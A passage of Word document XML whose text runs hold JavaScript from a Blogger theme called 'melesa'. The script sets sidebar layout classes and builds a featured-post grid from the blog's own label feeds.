    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        //customlayout checker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        var side_c = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        var sleft = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        var sright = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        if($('#sidebar-left-1').length &lt; 1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $('#left-sidebar-area').remove();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        }else{side_c++;sleft=true}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        if($('#sidebar-right-1').length &lt; 1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $('#right-sidebar-area').remove();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        }else{side_c++;sright = true}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        if(side_c == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $('#content-area').toggleClass('col-md-8').toggleClass('col-lg-6').toggleClass('col-md-push-3');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $('#right-sidebar-area').toggleClass('col-md-4').toggleClass('col-lg-3');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $('#left-sidebar-area').toggleClass('col-md-4').toggleClass('col-lg-3').toggleClass('col-md-pull-6');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        if(side_c == 0){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $('#content-area').toggleClass('col-md-8').toggleClass('col-md-12');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $('body').addClass('melesa-no-sidebar');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          if((sleft == true) &amp;&amp; (sright == true)){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $("#left-sidebar-area .column-left-outer, #content-area .column-center-outer, #right-sidebar-area .column-right-outer").stick_in_parent();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $('body').addClass('melesa-two-sidebar');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          if((sleft == false) &amp;&amp; (sright == true)){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $("#content-area .column-center-outer, #right-sidebar-area .column-right-outer").stick_in_parent();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $('body').addClass('melesa-one-sidebar');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          if((sleft == true) &amp;&amp; (sright == false)){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $('#content-area').addClass('col-md-push-4');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $('#left-sidebar-area').addClass('col-md-pull-8');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $("#left-sidebar-area .column-left-outer, #content-area .column-center-outer").stick_in_parent();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $('body').addClass('melesa-one-sidebar');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      //]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:if cond='data:blog.url == data:blog.homepageUrl'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        //&lt;![CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        $(document).ready(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          //melesa feature</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $('#melesa-featured .melesa_widget').map(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            var $t = $(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var lbl = $(this).attr('data-label');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var type = $(this).attr('data-type');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            type = type.toLowerCase();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            //now create the featured grid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $.ajax({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              url : "/feeds/posts/default/-/" + lbl + "?alt=json-in-script&amp;max-results=5",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              type: 'get',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              dataType: "jsonp",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              success: function(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                //console.log(JSON.stringify(e));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                if(e.feed.entry){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                }else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  var c = '&lt;div class="mlsa-no-post"&gt;&lt;div class="mlsa-table"&gt;&lt;div class="mlsa-cell"&gt;&lt;img src="https://3.bp.blogspot.com/-UKWIRzqbrE0/W2FUQVPeutI/AAAAAAAAACU/5JRAWbOBx9491ElSDj3krdSsZIfI7fjGwCLcBGAs/s1600/nf.jpg"&gt;&lt;br/&gt;&lt;h3&gt;No Posts Found For Label : ' + lbl + ' &lt;/h3&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  $t.html(c);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                if(e.feed.entry){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  var c = '&lt;div class=\'melesa-grid '+ type +'\'&gt;&lt;div class=\'row\'&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  for(var i=0;i&lt;e.feed.entry.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    //get info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    var p = e.feed.entry[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    var title = p.title.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    if(p.media$thumbnail){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var pi = p.media$thumbnail.url;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      //check for the location for thumbnail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      if(pi.indexOf('/s72-c') !== -1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        pi = pi.replace('/s72-c','/s1600');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      if(pi.indexOf('img.youtube.com') !== -1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        pi = pi.replace('/default.jpg','/maxresdefault.jpg');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    }else{</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var pi = 'https://3.bp.blogspot.com/-UKWIRzqbrE0/W2FUQVPeutI/AAAAAAAAACU/5JRAWbOBx9491ElSDj3krdSsZIfI7fjGwCLcBGAs/s1600/nf.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    }//pi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    for(var xc=0;xc&lt;p.link.length;xc++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      if(p.link[xc].rel == 'alternate'){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        var pu = p.link[xc].href;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    }//pu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    var pa = p.author[0].name.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    var pau = p.author[0].uri.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    var time = p.published.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    time = time.split('T');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    var mnt = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sept", "Oct", "Nov", "Dec"];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    time = time[0].split('-');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    time = mnt[Number(time[1]) - 1] + ' ' +  time[2] + ', ' + time[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    //label</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    for(var nu=0;nu &lt; e.feed.link.length;nu++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      if(e.feed.link[nu].rel == "alternate"){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        var ll = e.feed.link[nu].href + '?max-results=' + perpage;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    //format markup</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    switch(type){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      case "grid-1":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        switch(i){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-lg-6"&gt;&lt;div class="first"&gt;&lt;div class="pthumb"&gt;&lt;div class="big" style="background:url('+ pi +')"&gt;&lt;div class="wrapper-post"&gt;&lt;div class="post-tags"&gt;&lt;a name="Post related to '+lbl+'" href="'+ ll +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;div class="post-meta"&gt;&lt;div class="ptitle"&gt;&lt;h3 class="pt"&gt;&lt;a name="'+ title +'" href="'+ pu +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;div class="other-meta"&gt;&lt;span class="author-meta"&gt;&lt;a href="'+ pau +'" name="Written By '+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;a href="'+ pu +'" name="Posted at ' + time + '"&gt;'+ time +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-lg-6"&gt;&lt;div class="row"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-lg-6"&gt;&lt;div class="first"&gt;&lt;div class="pthumb"&gt;&lt;div class="big" style="background:url('+ pi +')"&gt;&lt;div class="wrapper-post"&gt;&lt;div class="post-tags"&gt;&lt;a name="Post related to '+lbl+'" href="'+ ll +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;div class="post-meta"&gt;&lt;div class="ptitle"&gt;&lt;h3 class="pt"&gt;&lt;a name="'+ title +'" href="'+ pu +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;div class="other-meta"&gt;&lt;span class="author-meta"&gt;&lt;a href="'+ pau +'" name="Written By '+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;a href="'+ pu +'" name="Posted at ' + time + '"&gt;'+ time +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(e.feed.entry.length == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              c = c + '&lt;/div&gt;&lt;!--/row--&gt;&lt;/div&gt;&lt;!--colsm6--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-lg-6"&gt;&lt;div class="first"&gt;&lt;div class="pthumb"&gt;&lt;div class="big" style="background:url('+ pi +')"&gt;&lt;div class="wrapper-post"&gt;&lt;div class="post-tags"&gt;&lt;a name="Post related to '+lbl+'" href="'+ ll +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;div class="post-meta"&gt;&lt;div class="ptitle"&gt;&lt;h3 class="pt"&gt;&lt;a name="'+ title +'" href="'+ pu +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;div class="other-meta"&gt;&lt;span class="author-meta"&gt;&lt;a href="'+ pau +'" name="Written By '+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;a href="'+ pu +'" name="Posted at ' + time + '"&gt;'+ time +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                            c = c + '&lt;/div&gt;&lt;!--/row--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(e.feed.entry.length == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              console.log('3close');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              c = c + '&lt;/div&gt;&lt;!--colsm6--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="row"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-lg-6"&gt;&lt;div class="first"&gt;&lt;div class="pthumb"&gt;&lt;div class="big" style="background:url('+ pi +')"&gt;&lt;div class="wrapper-post"&gt;&lt;div class="post-tags"&gt;&lt;a name="Post related to '+lbl+'" href="'+ ll +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;div class="post-meta"&gt;&lt;div class="ptitle"&gt;&lt;h3 class="pt"&gt;&lt;a name="'+ title +'" href="'+ pu +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;div class="other-meta"&gt;&lt;span class="author-meta"&gt;&lt;a href="'+ pau +'" name="Written By '+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;a href="'+ pu +'" name="Posted at ' + time + '"&gt;'+ time +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(e.feed.entry.length == 4){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              console.log('4close');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              c = c + '&lt;/div&gt;&lt;!--/row--&gt;&lt;/div&gt;&lt;!--colsm6--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 4:</w:t>
      </w:r>
    </w:p>
